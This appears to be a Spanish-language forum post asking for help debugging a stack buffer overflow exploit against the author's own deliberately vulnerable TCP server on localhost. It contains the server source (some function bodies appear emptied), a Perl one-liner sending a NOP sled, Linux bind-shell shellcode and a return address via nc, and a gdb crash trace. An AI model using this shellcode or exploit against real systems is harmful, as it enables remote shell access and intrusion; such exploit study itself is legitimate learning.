Código
#include <sys/socket.h> #include <arpa/inet.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #include <time.h> int socketfd, newsocket; int vuln (char *trampa) { char buffer [100]; } void shutup (int signal) { times (); close (newsocket); close (socketfd); } int times () { struct tm *ahora; char buffer [40]; return 0; } int main (int argc, char *argv []) { struct tm *ahora; char hora [40]; if (getuid()!=0) { return 1; } if (argc<2) { return 1; } int cont; struct sockaddr_in client, host; char buffer [1024]; int size=sizeof (client); socketfd=socket (2, 1 , 0); host.sin_family=AF_INET; host.sin_addr.s_addr=0; bind (socketfd, (struct sockaddr*)&host, sizeof (struct sockaddr)); listen (socketfd, 3); times (); signal (SIGTERM, shutup); signal (SIGINT, shutup); while (1) { newsocket=accept (socketfd, (struct sockaddr*)&client, &size); times (); cont=recv (newsocket, &buffer, 1024, 0); while (cont>2) { times (); buffer [cont-1]='\0'; vuln (buffer); cont=recv (newsocket, &buffer, 1024, 0); } times (); printf ("Finishing connection from %s:%d\n\n", inet_ntoa (client.sin_addr), ntohs (client.sin_port)); close (newsocket); } close (socketfd); return 0; }
Y os remito el comando que estoy usando para explotar el fallo... [8 nops + 92 shellcode + 4 ret + 1 null']
Código:
juanra@Juanra:~$ perl -e 'print "\x90"x8 . "\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\xc4\xf7\xff\xbf" . "\x00"' | nc -vv localhost 5555555
Código
... el último byte (se programó así por el \n de muchos clientes) se borra.
while (cont>2) { times (); --> buffer [cont-1]='\0';
El caso es que compilo sin ninguna protección...
Código:
juanra@Juanra:~$ sudo gdb -q ./serv
[sudo] password for juanra:
(gdb) r 31337
Starting program: /home/juanra/serv 31337
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 18/02/2011 01:05:14
18/02/2011 01:05:14 Starting up...
18/02/2011 01:05:21 Got connection from 127.0.0.1:45163
18/02/2011 01:05:21 RECV 113 bytes: ��������jfX�1�CRjj��̀�jfXCRfhzifS��jQV��̀�fCCSV��̀�fCRRV��̀�jY�?̀Iy��
Rh//shh/bin��R��S��̀������������
Program received signal SIGSEGV, Segmentation fault.
0xbffff801 in ?? ()
(gdb) x/16x 0xbffff801
0xbffff801: 0x00000000 0x07000000 0x04000000 0x07000000
0xbffff811: 0x1c000000 0x10bffff8 0x02000000 0x00697a00
0xbffff821: 0x02000000 0x01000000 0x00000000 0xc4000000
0xbffff831: 0x00bffff7 0x5c000000 0x00bffff8 0xc4000000
(gdb) i r eip
eip 0xbffff801 0xbffff801
(gdb)
Llevo toda la noche pensando, pero no se me ocurre nada... Qué puede ser?
PD: Si os hace falta más información preguntadme.
Gracias! Un saludo
Sagrini